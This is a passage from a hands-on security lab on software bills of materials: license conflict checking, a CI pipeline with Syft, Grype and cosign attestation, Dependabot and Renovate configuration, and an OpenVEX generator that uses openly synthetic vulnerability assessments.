| LGPL-2.1 + MIT | No (if dynamically linked) | LGPL allows linking with permissive code |
| AGPL-3.0 + anything proprietary | Yes | AGPL requires source disclosure for network use |
| BSD-3-Clause + MIT | No | Both permissive |
When your SBOM includes components with conflicting licenses, you must either:
- Replace the conflicting component with a compatible alternative
- Obtain a commercial license exception from the copyright holder
- Restructure the application to isolate GPL-licensed components (e.g., separate microservice)
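The conflict table above can be encoded as a small pairwise checker. The conflict set below is an illustrative subset keyed on frozensets of SPDX IDs, not a complete compatibility matrix — a real audit should use a maintained compatibility database and account for linking mode (static vs. dynamic) and distribution:

```python
# Pairwise license conflicts mirroring the table (illustrative subset).
CONFLICT_PAIRS = {
    frozenset({"MIT", "GPL-3.0-only"}): "GPL requires derivative works to be GPL (if distributing)",
    frozenset({"Apache-2.0", "GPL-2.0-only"}): "Apache-2.0 patent clause incompatible with GPL-2.0",
}
AGPL = "AGPL-3.0-only"

def find_conflicts(licenses: list[str], proprietary: bool = True) -> list[str]:
    """Return human-readable conflicts among a set of component licenses."""
    findings = []
    seen = set(licenses)
    for pair, reason in CONFLICT_PAIRS.items():
        if pair <= seen:  # both licenses of the pair are present
            a, b = sorted(pair)
            findings.append(f"{a} + {b}: {reason}")
    if AGPL in seen and proprietary:
        findings.append(f"{AGPL} + proprietary code: network-use source disclosure required")
    return findings

print(find_conflicts(["MIT", "Apache-2.0", "GPL-3.0-only"], proprietary=False))
```

Fed with the `license_id` values extracted by `license_audit.py`, this turns the per-component policy check into a whole-application compatibility check.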
Phase 6: CI/CD Integration¶
Objective¶
Integrate SBOM generation, vulnerability scanning, attestation, and VEX document creation into an automated CI/CD pipeline.
6.1 — GitHub Actions SBOM Pipeline¶
cat > ~/lab31-sbom/ci/sbom-pipeline.yml << 'PIPELINE'
# .github/workflows/sbom-pipeline.yml
# SBOM Generation, Scanning, and Attestation Pipeline
# Meridian Software Corp — internal.example.com
# Auth: testuser / REDACTED
name: SBOM Pipeline
on:
push:
branches: [main, develop]
pull_request:
branches: [main]
schedule:
# Weekly rescan for new vulnerabilities
- cron: '0 6 * * 1'
permissions:
contents: read
security-events: write
id-token: write # Required for Sigstore cosign
packages: write
attestations: write
env:
REGISTRY: registry.internal.example.com
SBOM_SERVER: https://sbom-server.internal.example.com
NVD_API_KEY: ${{ secrets.NVD_API_KEY }}
jobs:
# ── Stage 1: Generate SBOMs ──
generate-sbom:
runs-on: ubuntu-latest
strategy:
matrix:
app:
- name: meridian-web-portal
path: apps/meridian-web-portal
type: node
- name: meridian-data-pipeline
path: apps/meridian-data-pipeline
type: python
- name: meridian-api-gateway
path: apps/meridian-api-gateway
type: java
steps:
- uses: actions/checkout@v4
- name: Install Syft
uses: anchore/sbom-action/download-syft@v0
- name: Generate CycloneDX SBOM
run: |
syft scan dir:${{ matrix.app.path }} \
--output cyclonedx-json=sbom-${{ matrix.app.name }}-cdx.json \
--name "${{ matrix.app.name }}" \
--version "${{ github.sha }}"
- name: Generate SPDX SBOM
run: |
syft scan dir:${{ matrix.app.path }} \
--output spdx-json=sbom-${{ matrix.app.name }}-spdx.json \
--name "${{ matrix.app.name }}" \
--version "${{ github.sha }}"
- name: Upload SBOM Artifacts
uses: actions/upload-artifact@v4
with:
name: sbom-${{ matrix.app.name }}
path: |
sbom-${{ matrix.app.name }}-cdx.json
sbom-${{ matrix.app.name }}-spdx.json
# ── Stage 2: Vulnerability Scan ──
vulnerability-scan:
needs: generate-sbom
runs-on: ubuntu-latest
strategy:
matrix:
app: [meridian-web-portal, meridian-data-pipeline, meridian-api-gateway]
steps:
- name: Download SBOM
uses: actions/download-artifact@v4
with:
name: sbom-${{ matrix.app }}
- name: Install Grype
uses: anchore/scan-action/download-grype@v4
- name: Scan for Vulnerabilities
run: |
grype sbom:sbom-${{ matrix.app }}-cdx.json \
--output json \
--file vuln-report-${{ matrix.app }}.json \
--fail-on critical
- name: Upload Vulnerability Report
if: always()
uses: actions/upload-artifact@v4
with:
name: vuln-${{ matrix.app }}
path: vuln-report-${{ matrix.app }}.json
- name: Upload SARIF to GitHub Security
if: always()
run: |
grype sbom:sbom-${{ matrix.app }}-cdx.json \
--output sarif \
--file vuln-${{ matrix.app }}.sarif
- name: Upload SARIF
if: always()
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: vuln-${{ matrix.app }}.sarif
category: sbom-${{ matrix.app }}
# ── Stage 3: License Compliance ──
license-check:
needs: generate-sbom
runs-on: ubuntu-latest
strategy:
matrix:
app: [meridian-web-portal, meridian-data-pipeline, meridian-api-gateway]
steps:
- uses: actions/checkout@v4
- name: Download SBOM
uses: actions/download-artifact@v4
with:
name: sbom-${{ matrix.app }}
- name: Setup Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Run License Audit
run: |
python scripts/license_audit.py sbom-${{ matrix.app }}-cdx.json \
| tee license-report-${{ matrix.app }}.txt
- name: Check for Prohibited Licenses
run: |
          if grep -q "\[PROHIBITED\]" license-report-${{ matrix.app }}.txt; then
echo "::error::Prohibited license detected in ${{ matrix.app }}"
exit 1
fi
# ── Stage 4: SBOM Attestation with Sigstore ──
attest:
needs: [vulnerability-scan, license-check]
runs-on: ubuntu-latest
if: github.ref == 'refs/heads/main'
strategy:
matrix:
app: [meridian-web-portal, meridian-data-pipeline, meridian-api-gateway]
steps:
- name: Download SBOM
uses: actions/download-artifact@v4
with:
name: sbom-${{ matrix.app }}
- name: Install cosign
uses: sigstore/cosign-installer@v3
- name: Sign SBOM with Sigstore (Keyless)
run: |
          cosign attest-blob \
            --predicate sbom-${{ matrix.app }}-cdx.json \
            --type cyclonedx \
            --bundle sbom-${{ matrix.app }}-attestation.json \
            --yes \
            sbom-${{ matrix.app }}-cdx.json
- name: Upload Attestation
uses: actions/upload-artifact@v4
with:
name: attestation-${{ matrix.app }}
path: sbom-${{ matrix.app }}-attestation.json
- name: Publish SBOM to SBOM Server
run: |
echo "Publishing SBOM to ${SBOM_SERVER}/api/v1/sbom"
# curl -X POST "${SBOM_SERVER}/api/v1/sbom" \
# -H "Authorization: Bearer ${SBOM_TOKEN}" \
# -H "Content-Type: application/json" \
# -d @sbom-${{ matrix.app }}-cdx.json
echo "SBOM published successfully (simulated)"
# ── Stage 5: Generate VEX Document ──
generate-vex:
needs: vulnerability-scan
runs-on: ubuntu-latest
if: github.ref == 'refs/heads/main'
steps:
- uses: actions/checkout@v4
- name: Download All Vulnerability Reports
uses: actions/download-artifact@v4
with:
pattern: vuln-*
merge-multiple: true
- name: Generate VEX Document
run: |
python scripts/generate_vex.py \
--vulns vuln-report-*.json \
--output vex-document.json
- name: Upload VEX Document
uses: actions/upload-artifact@v4
with:
name: vex-document
path: vex-document.json
PIPELINE
6.2 — CI/CD Pipeline Architecture¶
flowchart TB
subgraph "Trigger"
A[Git Push / PR / Schedule]
end
subgraph "Stage 1: SBOM Generation"
B1[Syft Scan<br/>npm app]
B2[Syft Scan<br/>pip app]
B3[Syft Scan<br/>Maven app]
B1 --> C1[CycloneDX JSON]
B1 --> C2[SPDX JSON]
B2 --> C3[CycloneDX JSON]
B2 --> C4[SPDX JSON]
B3 --> C5[CycloneDX JSON]
B3 --> C6[SPDX JSON]
end
subgraph "Stage 2: Vulnerability Scan"
D1[Grype Scan] --> E1[Vuln Report JSON]
D1 --> E2[SARIF Upload]
E2 --> F1[GitHub Security Tab]
end
subgraph "Stage 3: License Check"
G1[License Audit] --> H1{Prohibited?}
H1 -->|Yes| I1[FAIL Pipeline]
H1 -->|No| I2[PASS]
end
subgraph "Stage 4: Attestation"
J1[cosign attest-blob] --> K1[Sigstore Bundle]
K1 --> L1[SBOM Server]
end
subgraph "Stage 5: VEX"
M1[Generate VEX] --> N1[VEX Document]
end
A --> B1 & B2 & B3
C1 & C3 & C5 --> D1
C1 & C3 & C5 --> G1
D1 & I2 --> J1
E1 --> M1
style I1 fill:#d32f2f,color:#fff
style I2 fill:#388e3c,color:#fff
style K1 fill:#1565c0,color:#fff
style F1 fill:#7b1fa2,color:#fff
6.3 — Dependabot Configuration¶
cat > ~/lab31-sbom/ci/dependabot.yml << 'DEPENDABOT'
# .github/dependabot.yml
# Automated dependency update configuration
# Meridian Software Corp — internal.example.com
version: 2
registries:
npm-internal:
type: npm-registry
url: https://nexus.internal.example.com/npm/
token: ${{ secrets.NEXUS_TOKEN }}
pypi-internal:
type: python-index
url: https://nexus.internal.example.com/pypi/simple/
username: testuser
password: ${{ secrets.NEXUS_PASSWORD }}
updates:
# npm dependencies
- package-ecosystem: "npm"
directory: "/apps/meridian-web-portal"
schedule:
interval: "weekly"
day: "monday"
time: "06:00"
timezone: "America/New_York"
open-pull-requests-limit: 10
reviewers:
- "security-team"
labels:
- "dependencies"
- "security"
- "auto-update"
commit-message:
prefix: "deps(npm)"
registries:
- npm-internal
groups:
production-deps:
patterns:
- "*"
exclude-patterns:
- "@types/*"
- "eslint*"
- "jest*"
- "typescript"
update-types:
- "minor"
- "patch"
dev-deps:
patterns:
- "@types/*"
- "eslint*"
- "jest*"
- "typescript"
ignore:
# Ignore major version updates without manual review
- dependency-name: "*"
update-types: ["version-update:semver-major"]
# pip dependencies
- package-ecosystem: "pip"
directory: "/apps/meridian-data-pipeline"
schedule:
interval: "weekly"
day: "monday"
time: "06:00"
open-pull-requests-limit: 10
reviewers:
- "security-team"
labels:
- "dependencies"
- "security"
- "auto-update"
commit-message:
prefix: "deps(pip)"
registries:
- pypi-internal
# Maven dependencies
- package-ecosystem: "maven"
directory: "/apps/meridian-api-gateway"
schedule:
interval: "weekly"
day: "monday"
time: "06:00"
open-pull-requests-limit: 10
reviewers:
- "security-team"
labels:
- "dependencies"
- "security"
- "auto-update"
commit-message:
prefix: "deps(maven)"
# GitHub Actions
- package-ecosystem: "github-actions"
directory: "/"
schedule:
interval: "weekly"
labels:
- "ci"
- "dependencies"
DEPENDABOT
6.4 — Renovate Configuration (Alternative to Dependabot)¶
cat > ~/lab31-sbom/ci/renovate.json << 'RENOVATE'
{
"$schema": "https://docs.renovatebot.com/renovate-schema.json",
"description": "Renovate configuration for Meridian Software Corp",
"extends": [
"config:recommended",
"security:openssf-scorecard",
":dependencyDashboard",
":semanticCommits"
],
"registryAliases": {
"npm-internal": "https://nexus.internal.example.com/npm/",
"pypi-internal": "https://nexus.internal.example.com/pypi/simple/"
},
"timezone": "America/New_York",
"schedule": ["before 8am on Monday"],
"prHourlyLimit": 5,
"prConcurrentLimit": 15,
"labels": ["dependencies", "security", "auto-update"],
"reviewers": ["security-team"],
"vulnerabilityAlerts": {
"enabled": true,
"labels": ["security-alert"],
"schedule": ["at any time"]
},
"packageRules": [
{
"description": "Auto-merge patch updates for production deps",
"matchUpdateTypes": ["patch"],
"matchDepTypes": ["dependencies"],
"automerge": true,
"automergeType": "pr",
"automergeStrategy": "squash",
"platformAutomerge": true
},
{
"description": "Group all dev dependency updates",
"matchDepTypes": ["devDependencies"],
"groupName": "dev dependencies",
"automerge": true
},
{
"description": "Block major updates — require manual review",
"matchUpdateTypes": ["major"],
"automerge": false,
"labels": ["major-update", "manual-review"]
},
{
"description": "Security updates — immediate, bypass normal schedule",
"matchCategories": ["security"],
"schedule": ["at any time"],
"automerge": true,
"prPriority": 10
}
],
"customManagers": [
{
"customType": "regex",
"fileMatch": ["Dockerfile$"],
"matchStrings": [
"FROM\\s+(?<depName>[^:]+):(?<currentValue>[^\\s@]+)(?:@(?<currentDigest>sha256:[a-f0-9]+))?"
],
"datasourceTemplate": "docker"
}
]
}
RENOVATE
6.5 — SBOM Attestation with Sigstore cosign¶
Why Attestation Matters
SBOM attestation cryptographically binds an SBOM to the build that produced it. Without attestation, an SBOM is just a JSON file — anyone could have created it. With Sigstore cosign, you get:
- Keyless signing — no key management overhead (uses OIDC identity)
- Transparency log — all attestations are recorded in Rekor for auditability
- Tamper detection — any modification to the SBOM invalidates the signature
- Supply chain provenance — proves WHO built WHAT, WHEN, and FROM which source
# ── Sign an SBOM with cosign (keyless, using Sigstore) ──
cosign attest-blob \
  --predicate sboms/web-portal-syft-cdx.json \
  --type cyclonedx \
  --bundle attestations/web-portal-attestation.json \
  --yes \
  sboms/web-portal-syft-cdx.json
# ── Verify the attestation ──
cosign verify-blob-attestation \
--bundle attestations/web-portal-attestation.json \
--certificate-identity "testuser@internal.example.com" \
--certificate-oidc-issuer "https://auth.internal.example.com" \
--type cyclonedx \
sboms/web-portal-syft-cdx.json
Expected output:
Verified OK
6.6 — VEX Document Creation¶
VEX (Vulnerability Exploitability eXchange) documents communicate the actual exploitability status of vulnerabilities in the context of a specific product.
cat > ~/lab31-sbom/scripts/generate_vex.py << 'VEX_GEN'
#!/usr/bin/env python3
"""
VEX Document Generator — Creates Vulnerability Exploitability eXchange documents
in OpenVEX format to communicate vulnerability status to consumers.
Lab 31: SBOM Analysis & Supply Chain Security
"""
import json
import sys
from datetime import datetime, timezone
def generate_vex_document(app_name: str, vulns: list[dict]) -> dict:
"""Generate an OpenVEX document for a set of vulnerabilities."""
vex = {
"@context": "https://openvex.dev/ns/v0.2.0",
"@id": f"https://sbom-server.internal.example.com/vex/{app_name}/2026-04-12",
"author": "Meridian Security Engineering <security@internal.example.com>",
"role": "Document Creator",
"timestamp": "2026-04-12T10:00:00Z",
"version": 1,
"tooling": "Lab 31 VEX Generator v1.0",
"statements": [],
}
# ── Define VEX status for each vulnerability ──
vex_assessments = {
"CVE-SYNTH-2026-1001": {
"status": "affected",
"justification": None,
"action_statement": "Update axios to version 1.6.1 or later. The SSRF vulnerability is exploitable in our configuration because the web portal makes proxy-configured HTTP requests based on user input.",
"impact_statement": "An attacker could redirect internal HTTP requests to access services on 10.50.0.0/16 network."
},
"CVE-SYNTH-2026-1002": {
"status": "affected",
"justification": None,
"action_statement": "URGENT: Update jsonwebtoken to 9.0.1 immediately. Our authentication middleware does not explicitly set the 'algorithms' option, making it vulnerable to algorithm confusion. This is listed in CISA KEV.",
"impact_statement": "Authentication bypass allows unauthenticated access to all API endpoints."
},
"CVE-SYNTH-2026-1003": {
"status": "not_affected",
"justification": "vulnerable_code_not_in_execute_path",
"action_statement": "No action required. Our code does not use lodash merge/mergeWith/defaultsDeep functions. Verified by static analysis scan on 2026-04-10.",
"impact_statement": None,
},
"CVE-SYNTH-2026-1004": {
"status": "not_affected",
"justification": "vulnerable_code_cannot_be_controlled_by_adversary",
"action_statement": "No immediate action required. Moment locale loading is hardcoded to 'en-US' and does not accept user input. Schedule update to 2.30.1 in next maintenance window.",
"impact_statement": None,
},
"CVE-SYNTH-2026-1005": {
"status": "affected",
"justification": None,
"action_statement": "Update semver to 7.5.5. While ReDoS requires crafted input, the version range parser processes user-supplied version constraints in the plugin system.",
"impact_statement": "Denial of service via crafted version range strings in plugin manifest."
},
"CVE-SYNTH-2026-1006": {
"status": "under_investigation",
"justification": None,
"action_statement": "Security team is analyzing whether the open redirect in express is reachable through our route configuration. Expected completion: 2026-04-15.",
"impact_statement": None,
},
"CVE-SYNTH-2026-2001": {
"status": "affected",
"justification": None,
"action_statement": "CRITICAL: Update cryptography to 41.0.7 immediately. The data pipeline uses RSA OAEP for encrypting data at rest. This vulnerability is in CISA KEV with active exploitation.",
"impact_statement": "Remote code execution via crafted ciphertext in data ingestion pipeline."
},
"CVE-SYNTH-2026-2002": {
"status": "affected",
"justification": None,
"action_statement": "Update Pillow to 10.2.0. The data pipeline processes user-uploaded TIFF images in the document processing module.",
"impact_statement": "Remote code execution via crafted TIFF image upload."
},
"CVE-SYNTH-2026-2003": {
"status": "not_affected",
"justification": "vulnerable_code_not_in_execute_path",
"action_statement": "No action required. Jinja2 is used only for internal report generation with hardcoded templates. User input is never passed to the template engine.",
"impact_statement": None,
},
"CVE-SYNTH-2026-2004": {
"status": "affected",
"justification": None,
"action_statement": "Update paramiko to 3.4.0. The data pipeline uses SFTP for file transfer with external partners. Host key validation configuration needs review.",
"impact_statement": "Man-in-the-middle attack on SFTP file transfers with partner systems."
},
"CVE-SYNTH-2026-3001": {
"status": "not_affected",
"justification": "vulnerable_code_cannot_be_controlled_by_adversary",
"action_statement": "No immediate action required. Our Log4j2 pattern layouts do not include ThreadContext map data. Schedule update to 2.23.0 in next quarterly patch cycle.",
"impact_statement": None,
},
"CVE-SYNTH-2026-3002": {
"status": "affected",
"justification": None,
"action_statement": "Update jackson-databind to 2.16.1. The API gateway deserializes JSON payloads from external clients. While default typing is not globally enabled, review custom ObjectMapper configurations.",
"impact_statement": "Potential remote code execution via crafted JSON payload."
},
}
for vuln_id, assessment in vex_assessments.items():
statement = {
"vulnerability": {
"@id": f"https://nvd-mirror.internal.example.com/vuln/{vuln_id}",
"name": vuln_id,
},
"products": [
{
"@id": f"pkg:generic/{app_name}",
}
],
"status": assessment["status"],
}
if assessment["justification"]:
statement["justification"] = assessment["justification"]
if assessment["action_statement"]:
statement["action_statement"] = assessment["action_statement"]
if assessment["impact_statement"]:
statement["impact_statement"] = assessment["impact_statement"]
vex["statements"].append(statement)
return vex
if __name__ == "__main__":
vex_doc = generate_vex_document("meridian-platform", [])
output_path = "reports/vex-document.json"
with open(output_path, "w") as f:
json.dump(vex_doc, f, indent=2)
print(f"VEX document generated: {output_path}")
print(f"Total statements: {len(vex_doc['statements'])}")
# Summary
status_counts = {}
for stmt in vex_doc["statements"]:
status = stmt["status"]
status_counts[status] = status_counts.get(status, 0) + 1
print(f"\nVEX Status Summary:")
for status, count in sorted(status_counts.items()):
print(f" {status:<25} {count}")
print(f"\nAffected vulnerabilities requiring action:")
for stmt in vex_doc["statements"]:
if stmt["status"] == "affected":
vuln_id = stmt["vulnerability"]["name"]
action = stmt.get("action_statement", "No action specified")
print(f" {vuln_id}: {action[:80]}...")
VEX_GEN
chmod +x ~/lab31-sbom/scripts/generate_vex.py
Run (from the lab root, so the relative `reports/` path resolves):
cd ~/lab31-sbom && python3 scripts/generate_vex.py
Expected output:
VEX document generated: reports/vex-document.json
Total statements: 12
VEX Status Summary:
affected 7
not_affected 4
under_investigation 1
Affected vulnerabilities requiring action:
CVE-SYNTH-2026-1001: Update axios to version 1.6.1 or later. The SSRF vulnerability is exploitab...
CVE-SYNTH-2026-1002: URGENT: Update jsonwebtoken to 9.0.1 immediately. Our authentication middl...
CVE-SYNTH-2026-1005: Update semver to 7.5.5. While ReDoS requires crafted input, the version ra...
CVE-SYNTH-2026-2001: CRITICAL: Update cryptography to 41.0.7 immediately. The data pipeline use...
CVE-SYNTH-2026-2002: Update Pillow to 10.2.0. The data pipeline processes user-uploaded TIFF ima...
CVE-SYNTH-2026-2004: Update paramiko to 3.4.0. The data pipeline uses SFTP for file transfer wi...
CVE-SYNTH-2026-3002: Update jackson-databind to 2.16.1. The API gateway deserializes JSON paylo...
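Before publishing a VEX document, it is worth sanity-checking it against the OpenVEX rules the generator relies on. A minimal sketch (`validate_vex` is a hypothetical helper, not part of the official OpenVEX tooling):

```python
# Rules encoded here: every statement needs a known status; "not_affected"
# statements need a justification or impact_statement; "affected" statements
# need an action_statement. This mirrors the OpenVEX spec's requirements.
VALID_STATUSES = {"not_affected", "affected", "fixed", "under_investigation"}

def validate_vex(doc: dict) -> list[str]:
    """Return a list of rule violations found in an OpenVEX document."""
    errors = []
    for i, stmt in enumerate(doc.get("statements", [])):
        status = stmt.get("status")
        if status not in VALID_STATUSES:
            errors.append(f"statement {i}: invalid status {status!r}")
        if status == "not_affected" and not (
            stmt.get("justification") or stmt.get("impact_statement")
        ):
            errors.append(f"statement {i}: not_affected requires justification")
        if status == "affected" and not stmt.get("action_statement"):
            errors.append(f"statement {i}: affected requires action_statement")
    return errors

# Tiny synthetic document: statement 1 is missing its justification
doc = {"statements": [
    {"status": "affected", "action_statement": "Upgrade to 1.6.1"},
    {"status": "not_affected"},
]}
print(validate_vex(doc))  # -> ['statement 1: not_affected requires justification']
```

You could run this against `reports/vex-document.json` after generation; all twelve statements produced by the lab script should pass cleanly.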
Lab Review and Validation¶
Completion Checklist¶
Use this checklist to verify you have completed all lab phases:
| Phase | Task | Status |
|---|---|---|
| 1 | Generated SBOMs with Syft for all 3 apps (SPDX + CycloneDX) | ☐ |
| 1 | Generated SBOMs with Trivy for all 3 apps | ☐ |
| 1 | Generated SBOMs with cdxgen for all 3 apps | ☐ |
| 1 | Compared SPDX 2.3 vs CycloneDX 1.5 structure differences | ☐ |
| 1 | Verified component counts across tools | ☐ |
| 2 | Parsed SBOMs with sbom_parser.py | ☐ |
| 2 | Built dependency graph with dependency_tree.py | ☐ |
| 2 | Analyzed cross-application dependency overlap | ☐ |
| 2 | Calculated dependency depth and breadth metrics | ☐ |
| 3 | Scanned SBOMs with Grype for vulnerabilities | ☐ |
| 3 | Queried synthetic OSV database for vulnerability details | ☐ |
| 3 | Built risk priority matrix with CVSS + EPSS + KEV + business context | ☐ |
| 3 | Identified P0-EMERGENCY items requiring immediate action | ☐ |
| 4 | Ran typosquatting detector against all SBOMs | ☐ |
| 4 | Ran dependency confusion detector | ☐ |
| 4 | Analyzed package metadata for anomalies | ☐ |
| 5 | Extracted and classified all licenses from SBOMs | ☐ |
| 5 | Identified copyleft vs permissive license distribution | ☐ |
| 5 | Generated compliance matrix against enterprise policy | ☐ |
| 6 | Created GitHub Actions SBOM pipeline | ☐ |
| 6 | Configured Dependabot for automated updates | ☐ |
| 6 | Created Renovate configuration (alternative) | ☐ |
| 6 | Performed SBOM attestation with cosign | ☐ |
| 6 | Generated VEX document with exploitability assessments | ☐ |
Key Takeaways¶
What You Learned
- SBOM generation is tool-dependent — different tools produce different results. Always validate and document your tooling choices.
- Transitive dependencies are the real risk — direct dependencies are visible in manifests, but transitive dependencies hide deep in the supply chain.
- CVSS alone is insufficient — combining EPSS exploitation probability, CISA KEV status, and business context produces dramatically better prioritization.
- Supply chain attacks are multifaceted — typosquatting, dependency confusion, and maintainer compromise are all active threat vectors requiring distinct detection strategies.
- License compliance is a security concern — copyleft license violations can force source code disclosure, which is itself a security risk.
- Attestation closes the trust gap — without cryptographic attestation, SBOMs are unverifiable claims. Sigstore cosign provides keyless, auditable signing.
- Automation is non-negotiable — manual SBOM analysis does not scale. CI/CD integration ensures every build is analyzed.
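The prioritization takeaway can be made concrete with a toy scoring rule. This is a simplified sketch; the thresholds and tier names are illustrative, not the lab's actual risk-matrix logic:

```python
def priority(cvss: float, epss: float, in_kev: bool, internet_facing: bool) -> str:
    """Toy triage rule combining severity, exploitation likelihood, and context."""
    if in_kev and internet_facing:
        return "P0-EMERGENCY"   # known-exploited and reachable from the internet
    if in_kev or (cvss >= 9.0 and epss >= 0.5):
        return "P1-URGENT"
    if cvss >= 7.0 and epss >= 0.1:
        return "P2-HIGH"
    return "P3-SCHEDULED"

print(priority(cvss=8.1, epss=0.92, in_kev=True, internet_facing=True))   # -> P0-EMERGENCY
print(priority(cvss=9.8, epss=0.04, in_kev=False, internet_facing=True))  # -> P3-SCHEDULED
```

The second call illustrates the point: a critical CVSS score with a near-zero EPSS probability and no KEV listing can reasonably wait for a scheduled window, while a lower CVSS score with active exploitation cannot.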
Answers to Common Questions¶
FAQ
Q: Which SBOM format should I use — SPDX or CycloneDX? A: Use CycloneDX for security-focused workflows (vulnerability tracking, VEX) and SPDX for license compliance. Many organizations generate both. Government contracts may require SPDX for ISO/IEC 5962 compliance.
Q: How often should SBOMs be regenerated? A: Generate a new SBOM for every build/release. Additionally, run weekly rescans against updated vulnerability databases (new CVEs are published daily).
Q: What is the difference between VEX and a vulnerability report? A: A vulnerability report lists all known vulnerabilities. A VEX document adds context — is this vulnerability actually exploitable in YOUR product? VEX statements reduce false positives by marking vulnerabilities as "not_affected" with justification.
Q: Should I include devDependencies in SBOMs? A: Yes, if they are present in the build environment. Compromised devDependencies (like eslint-scope in 2018) can execute malicious code during the build process, even if they are not shipped in production.
Challenge Extensions¶
Bonus Challenges
- SBOM Diff: Write a script that compares two SBOMs of the same application (e.g., v3.8.1 vs v3.8.2) and reports added, removed, and updated components.
- Reachability Analysis: Integrate with a call graph analysis tool to determine if vulnerable code paths are actually reachable from application entry points.
- SBOM Enrichment: Write a script that enriches CycloneDX SBOMs with OpenSSF Scorecard data for each component.
- Custom Policy Engine: Build a policy engine that evaluates SBOMs against custom rules (e.g., "no packages with fewer than 1000 weekly downloads", "no packages published in the last 7 days").
- SBOM-to-Graph: Export SBOM dependency data to a Neo4j graph database and write Cypher queries for supply chain risk analysis.
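As a starting point for the SBOM Diff challenge, here is a minimal sketch that compares the `components` arrays of two CycloneDX documents keyed by purl (the inline SBOMs are synthetic fragments; a full solution would also diff hashes, licenses, and dependency edges):

```python
def diff_sboms(old: dict, new: dict) -> dict:
    """Compare two CycloneDX SBOMs: added, removed, and version-changed components."""
    def index(sbom: dict) -> dict:
        # Map purl-without-version -> version; rsplit keeps the last "@" as
        # the version separator, so scoped npm purls still index correctly
        out = {}
        for c in sbom.get("components", []):
            key = c.get("purl", c.get("name", "")).rsplit("@", 1)[0]
            out[key] = c.get("version", "")
        return out
    a, b = index(old), index(new)
    return {
        "added": sorted(set(b) - set(a)),
        "removed": sorted(set(a) - set(b)),
        "updated": sorted(k for k in set(a) & set(b) if a[k] != b[k]),
    }

v1 = {"components": [{"purl": "pkg:npm/axios@1.5.0", "version": "1.5.0"},
                     {"purl": "pkg:npm/lodash@4.17.21", "version": "4.17.21"}]}
v2 = {"components": [{"purl": "pkg:npm/axios@1.6.1", "version": "1.6.1"},
                     {"purl": "pkg:npm/semver@7.5.5", "version": "7.5.5"}]}
print(diff_sboms(v1, v2))
# -> {'added': ['pkg:npm/semver'], 'removed': ['pkg:npm/lodash'], 'updated': ['pkg:npm/axios']}
```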
Cross-References¶
- Chapter 24 — Supply Chain Attacks — Attack techniques and defense strategies for software supply chain security
- Chapter 54 — SBOM Operations — Enterprise SBOM lifecycle management, tooling comparisons, and maturity model
- Chapter 55 — Threat Modeling Operations — Threat modeling for supply chain risks, including STRIDE analysis of package registries
Lab 31 of the Nexus SecOps Lab Series. All data is synthetic. For educational use only.